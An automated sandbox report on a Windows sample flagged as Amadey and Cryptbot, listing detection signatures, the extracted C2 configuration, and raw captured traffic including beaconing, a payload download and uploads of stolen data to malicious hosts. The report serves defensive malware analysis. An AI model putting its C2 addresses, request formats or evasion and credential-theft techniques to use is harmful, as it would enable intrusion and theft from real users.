Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561355
MD5: 7e87644426bb54d86265dd3c83727973
SHA1: 5d7148bdfa59cdc79275e087aa0fc6a7659c2029
SHA256: bba49d9c5a233f7916671750711049be4108a7ffae09e955bc9e90c03d2c4ab1
Tags: exeuser-Bitsight
Infos:

Detection

Amadey, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.43/Zu7JuNko/index.php0001 Avira URL Cloud: Label: phishing
Source: http://185.215.113.43/Zu7JuNko/index.phpomf Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpFIL Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpWin~ Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php32# Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpncodedU Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php: Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000006.00000002.3311482909.0000000000061000.00000040.00000001.01000000.00000007.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 50%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 50%
Source: file.exe Virustotal: Detection: 43% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Source: 870da04327.exe, 00000007.00000003.2850266687.00000000071D2000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_a0a89c8c-6
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\doomed\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: chrome.exe Memory has grown: Private usage: 1MB later: 23MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49811 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49821
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49849 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49919 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49962 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49927 -> 34.116.198.130:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 185.215.113.43
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 06:21:10 GMTContent-Type: application/octet-streamContent-Length: 4416000Last-Modified: Sat, 23 Nov 2024 05:31:14 GMTConnection: keep-aliveETag: "674168a2-436200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 70 c5 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 a0 c5 00 00 04 00 00 d6 bd 43 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 5d c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 5d c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 e0 70 00 00 10 00 00 00 78 27 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 f0 70 00 00 00 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 00 71 00 00 02 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 38 00 00 10 71 00 00 02 00 00 00 8a 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 6b 6c 6e 65 64 69 70 00 b0 1b 00 00 b0 a9 00 00 ae 1b 00 00 8c 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 65 70 62 6d 69 64 6a 00 10 00 00 00 60 c5 00 00 06 00 00 00 3a 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 c5 00 00 22 00 00 00 40 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 33 37 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008370001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------4BCqNv1VbNZOBDh7EzQLi0Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 42 43 71 4e 76 31 56 62 4e 5a 4f 42 44 68 37 45 7a 51 4c 69 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 75 71 69 72 65 66 65 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 49 53 45 bc f9 a1 83 24 77 4d cd 6d f1 8c 1d 11 7a 51 31 4f 0f dd c4 03 86 58 d7 f3 06 94 a8 0c d1 e5 1e c4 44 b1 81 36 1b 58 8b 86 90 5d 53 9f 9f 5e 4d 93 b2 91 5a 13 db 65 13 a0 ff 72 ee b7 5a 3a cb 69 b7 d8 19 9b 10 4c 28 2b 21 79 b0 39 e8 f3 7f 1f 0e a9 78 36 3d 22 d6 71 59 f0 5e 66 63 28 c7 30 8e 13 ba 4e f1 83 b4 1d 0d ce 0b fe d2 67 37 31 77 d8 0b 44 0b aa 0a 6d 5a 4f c9 8b 30 50 f5 ad 58 15 55 70 cd 4f 22 fe 2b dc 05 d9 b8 a1 4c 48 26 f7 c7 ec f9 36 c1 e2 4a a7 b9 26 62 1a af 66 d1 ac 25 f7 47 26 1e 26 f9 bd 74 d1 20 69 da 94 37 25 3c 24 12 e9 db 1e d0 1e 28 92 37 ab 23 91 c0 8a 93 9e 03 56 d2 29 7c 72 d8 3d 9f bf 69 6e 79 35 ee af 51 d9 4b 41 19 57 5d a5 ef 98 6b f1 a8 2e d5 01 69 f9 bf e0 6f 3d 59 13 db 09 48 4c 3b c0 8b 0e 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 42 43 71 4e 76 31 56 62 4e 5a 4f 42 44 68 37 45 7a 51 4c 69 30 2d 2d 0d 0a Data Ascii: --------------------------4BCqNv1VbNZOBDh7EzQLi0Content-Disposition: form-data; name="file"; filename="Luqirefe.bin"Content-Type: application/octet-streamISE$wMmzQ1OXD6X]S^MZerZ:iL(+!y9x6="qY^fc(0Ng71wDmZO0PXUpO"+LH&6J&bf%G&&t i7%<$(7#V)|r=iny5QKAW]k.io=YHL;--------------------------4BCqNv1VbNZOBDh7EzQLi0--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 75864Content-Type: multipart/form-data; boundary=------------------------fF6IwTwd09YWXbRcVpTjJ5Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 66 46 36 49 77 54 77 64 30 39 59 57 58 62 52 63 56 70 54 6a 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 61 67 6f 76 6f 67 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 fc dc 2f 2e 64 1c 90 9a df dd 5c 54 6b da 10 33 e5 c2 ac 8a 59 37 04 e4 32 85 77 d7 79 67 69 a0 b7 73 d6 d2 71 d9 8f 27 e5 04 36 73 e3 0e bb 32 db 3c 37 a7 78 26 6b 70 fa 06 7e ff 07 0e 45 72 3f c8 78 4b 28 48 e0 62 6a 3e b6 5a 3b af 53 6a 4f fe c6 bb 96 d2 23 f9 3f 34 44 2e 74 5d 26 76 11 19 bd 4c e2 f9 1a b8 22 4d 32 7b 4d 2e 13 33 a1 81 0e 9d 4e 1e f2 7d d6 60 39 9d 96 b3 50 46 1f 8d d7 ab 2b 09 91 48 59 18 09 c4 ae 1d 8d 3f b1 c0 dd e0 08 37 73 80 34 af 38 98 7f ff 65 d9 67 85 d6 08 c3 31 20 f6 90 51 71 2a ea cb 03 ac a4 39 04 80 9a 4a 28 8b c4 df 38 a0 55 f1 70 4d 4d 34 15 f1 41 a0 5c d8 bf 11 60 ed 6d 77 63 3d c1 4e a7 e3 21 52 48 c6 59 d0 59 67 08 0f 33 47 99 cb 68 5b 49 9d 48 0a 38 b3 73 69 64 00 96 6b a6 6a cc 2d 67 3c 91 2e 66 d2 b3 09 19 7e c3 33 db a5 a2 f7 98 b3 ed 3a 0a 9d 3c ed a6 75 c4 2c 43 e2 b7 7c b7 79 0b 43 9b 12 18 b0 55 59 43 82 9e 0b 8c c7 49 3d 10 92 8f 3d 3e af 5f 0e bf 99 3b 98 0b 31 16 b3 c3 76 15 48 83 66 10 06 c3 25 42 52 9e 34 b0 75 75 be 00 e2 5f 4c 01 b9 6e eb f9 1f 4a 47 85 99 05 67 11 52 0e d3 59 61 d4 d1 74 55 39 b1 84 33 08 5d 61 30 9a b2 1b 23 d9 1c cc 49 0f 54 a3 55 07 a9 50 37 dd 0e 83 94 d8 50 9f ae cc 07 cc 64 7d c8 e4 84 ba 4f d5 f6 de b0 52 32 91 31 bd 7f ce 1d c2 0a 32 cd 57 7a e9 39 99 03 16 a1 e7 b4 02 b2 7a 99 00 7f 86 99 a5 a4 2b 56 68 75 a0 1f 99 ae a8 79 64 d1 57 65 e5 d9 8e 36 31 4e 04 db 83 f3 76 0f dd 7d 9a db f1 89 a7 3f cc 6f c2 75 0d 0a 30 57 f5 ae 87 bc 43 77 08 cb e9 d2 fa 92 6d ae 4a 95 7c 1b b7 cd 79 4f 74 20 66 4d f7 6b 0d 55 04 20 e5 f5 90 c8 ae f3 f9 b4 10 19 ea 95 9a 7f 26 9b 1b a6 2c c0 14 b9 22 25 b6 5b 9f d6 7f 88 55 a1 aa 36 d7 1e 9d 59 6f f3 75 86 91 75 ec 5b 52 7c be 57 dd e9 67 d2 00 7c bd e4 6a 18 08 5c 19 c4 99 96 a1 fb 46 b1 57 3b ed 9c 08 c1 a9 b5 5e 35 03 4d 68 4e 5e 45 0a b5 7b 66 1e c5 62 5f 50 91 3f 31 0f aa b2 b5 06 00 2c dc ce 8b 9e 3b d3 e3 42 f6 10 40 59 93 3c da 60 b0 0f 1c e9 ba 1c 87 fa 27 98 59 86 21 56 2b 51 90 c3 8f 21 e6 af 8b 7a 89 57 24 56 50 e9 ae 96 da 7c 7d bf e2 7f 10 ad b8 9f 25 39 63 0d ab 4c ce 1f 9c cf b3 8b f7 01 0f d4 86 bc 26 dc ea 18 a1 a6 41 cd f6 48 37 17 84 a4 0d 33 57 f9 88 19 7f c4 9e 74 db 96 ee 2f 6c 23 72 ab 43 12 54 1b e1 3d c7 3b 5d 32 76 44 fa be 94 92 fe 4e 21 3f 66 dd 3f 06 95 f7 9d db 75 3a 7f c1 27 ae 3d c5 25 52 f5 b2 5d 5a 84 3d e5 a5 7e 22 08 4b 90 97 3f 97 b5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
